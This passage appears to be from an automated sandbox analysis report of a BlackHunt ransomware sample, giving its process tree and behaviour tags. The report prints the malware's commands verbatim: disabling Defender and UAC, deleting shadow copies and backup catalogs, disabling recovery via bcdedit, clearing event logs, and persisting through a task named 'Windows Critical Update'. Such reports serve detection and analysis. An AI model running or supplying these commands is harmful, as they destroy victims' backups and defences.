2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 104 PID 1804 wrote to memory of 1468 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 104 PID 1804 wrote to memory of 5020 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 196 PID 1804 wrote to memory of 5020 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 196 PID 2996 wrote to memory of 2844 2996 cmd.exe 195 PID 2996 wrote to memory of 2844 2996 cmd.exe 195 PID 3192 wrote to memory of 3592 3192 cmd.exe 193 PID 3192 wrote to memory of 3592 3192 cmd.exe 193 PID 1804 wrote to memory of 3820 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 105 PID 1804 wrote to memory of 3820 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 105 PID 3380 wrote to memory of 1520 3380 cmd.exe 192 PID 3380 wrote to memory of 1520 3380 cmd.exe 192 PID 1804 wrote to memory of 4460 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 191 PID 1804 wrote to memory of 4460 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 191 PID 4800 wrote to memory of 3776 4800 cmd.exe 190 PID 4800 wrote to memory of 3776 4800 cmd.exe 190 PID 1804 wrote to memory of 1812 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 108 PID 1804 wrote to memory of 1812 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 108 PID 5020 wrote to memory of 3388 5020 cmd.exe 188 PID 5020 wrote to memory of 3388 5020 cmd.exe 188 PID 1468 wrote to memory of 1724 1468 cmd.exe 187 PID 1468 wrote to memory of 1724 1468 cmd.exe 187 PID 3820 wrote to memory of 3256 3820 cmd.exe 143 PID 3820 wrote to memory of 3256 3820 cmd.exe 143 PID 1804 wrote to memory of 3664 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 186 PID 1804 wrote to memory of 3664 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 186 PID 4460 wrote to memory of 4216 4460 cmd.exe 184 PID 4460 wrote to memory of 4216 4460 cmd.exe 184 PID 1804 wrote to memory of 4332 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 183 PID 1804 wrote to memory of 4332 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 183 PID 1804 wrote to memory of 1320 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 182 PID 1804 wrote to memory of 1320 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 182 PID 1804 wrote to memory of 1912 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 181 PID 1804 wrote to memory of 1912 1804 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe 181 PID 1812 wrote to memory of 1472 1812 cmd.exe 179 PID 1812 wrote to memory of 1472 1812 cmd.exe 179 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe"C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:5064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2276
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3624
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4604
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1656
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2648
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5000
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2088
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4680
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4804
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:8
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe" /F2⤵PID:4328
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4800
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2436
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:9832
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6844
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:10132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:9424
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5164
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:9668
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:9728
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6992
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:8752
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5064
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:14820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:7612
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:13828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10000
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:9776
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8260
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:5616
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:14564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:7248
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:13624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:13288
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:20016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:7456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:6876
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:17900
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:18900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7984 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 14604⤵
- Program crash
PID:5920
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe"2⤵PID:7336
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:12828
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:4544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:1932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:208
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:3256
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:4844
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe" /F1⤵
- Creates scheduled task(s)
PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:4800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3776
-
-
